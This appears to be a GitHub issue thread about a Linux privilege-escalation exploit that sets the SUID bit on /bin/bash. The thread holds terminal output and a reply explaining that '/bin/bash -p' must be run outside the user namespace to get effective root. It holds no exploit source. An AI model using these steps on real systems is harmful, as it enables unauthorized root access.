Open mortals-tx opened 2 years ago
maybe try making the suid binary something else besides bash
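`/bin/bash` is executed from within the exploit context, which is running in a user namespace. The uid=0 reported by that first shell is therefore root only inside the namespace, which is why `cat /etc/shadow` is still denied there.
The set-uid bit was applied successfully. You should get a root shell by running `/bin/bash -p` after leaving the namespaced shell: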
[*] Exploit success! /bin/bash is SUID now!
[+] Popping shell
-p: /root/.bash_profile: Permission denied
root@ubuntu-20-04-desktop-amd64:/home/user# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
root@ubuntu-20-04-desktop-amd64:/home/user# cat /etc/shadow
cat: /etc/shadow: Permission denied
root@ubuntu-20-04-desktop-amd64:/home/user# logout
-p: /root/.bash_logout: Permission denied
user@ubuntu-20-04-desktop-amd64:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1183448 Feb 25 2020 /bin/bash
user@ubuntu-20-04-desktop-amd64:~$ /bin/bash -p
bash-5.0# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare)
Linux c 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
command: make fuse
[*] Exploit success! /bin/bash is SUID now!
[+] Popping shell
-p: /root/.bash_profile: Permission denied
No access to root